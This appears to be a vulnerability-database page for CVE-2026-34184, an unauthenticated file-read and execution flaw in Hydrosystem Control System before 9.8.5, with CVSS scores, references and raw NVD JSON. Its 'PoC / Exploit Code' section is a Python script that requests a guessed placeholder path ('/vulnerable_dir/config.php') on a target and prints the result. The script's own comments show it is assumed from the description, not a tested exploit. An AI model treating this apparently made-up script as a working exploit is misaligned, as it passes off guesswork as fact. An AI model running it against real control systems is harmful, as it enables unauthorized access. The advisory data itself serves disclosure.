CVE-2026-34184

Description

Hydrosystem Control System does not enforce authorization for some directories. This allows an unauthorized attacker to read all files in these directories and even execute some of them. Critically the attacker could run PHP scripts directly on the connected database.This issue was fixed in Hydrosystem Control System version 9.8.5

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:hydrosystem.poznan:control_system:*:*:*:*:*:*:*:* - VULNERABLE

Hydrosystem Control System < 9.8.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-34184 - Unauthenticated File Read/Code Execution
Target: Hydrosystem Control System < 9.8.5
Author: Security Analyst
"""

import requests
import sys

def exploit(target_url):
    # The vulnerable directory might be '/admin/', '/includes/', or similar based on description
    # Assuming a PHP script exists that can be executed or a file can be read
    vuln_path = "/vulnerable_dir/config.php" 
    
    full_url = f"{target_url}{vuln_path}"
    
    print(f"[*] Attempting to exploit: {target_url}")
    
    try:
        # Sending request without authentication (PR:N)
        response = requests.get(full_url, timeout=10)
        
        if response.status_code == 200:
            print("[+] Exploit Successful! Unauthorized access confirmed.")
            print("[+] Response Content:")
            print(response.text[:500]) # Print first 500 chars
        else:
            print(f"[-] Exploit failed. HTTP Status: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} <http://target-ip>")
        sys.exit(1)
    exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34184
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34184
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34184/
[4] VulDB https://vuldb.com/cve/CVE-2026-34184
[5] https://cert.pl/posts/2026/04/CVE-2026-4901/
[6] https://www.hydrosystem.poznan.pl/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34184", "sourceIdentifier": "[email protected]", "published": "2026-04-09T10:16:22.110", "lastModified": "2026-04-20T17:06:12.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hydrosystem Control System does not enforce authorization for some directories. This allows an unauthorized attacker to read all files in these directories and even execute some of them. Critically the attacker could run PHP scripts directly on the connected database.This issue was fixed in Hydrosystem Control System version 9.8.5"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hydrosystem.poznan:control_system:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.8.5", "matchCriteriaId": "C9D6B388-FD5C-486B-9493-E99D5499652D"}]}]}], "references": [{"url": "https://cert.pl/posts/2026/04/CVE-2026-4901/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.hydrosystem.poznan.pl/", "source": "[email protected]", "tags": ["Product"]}]}}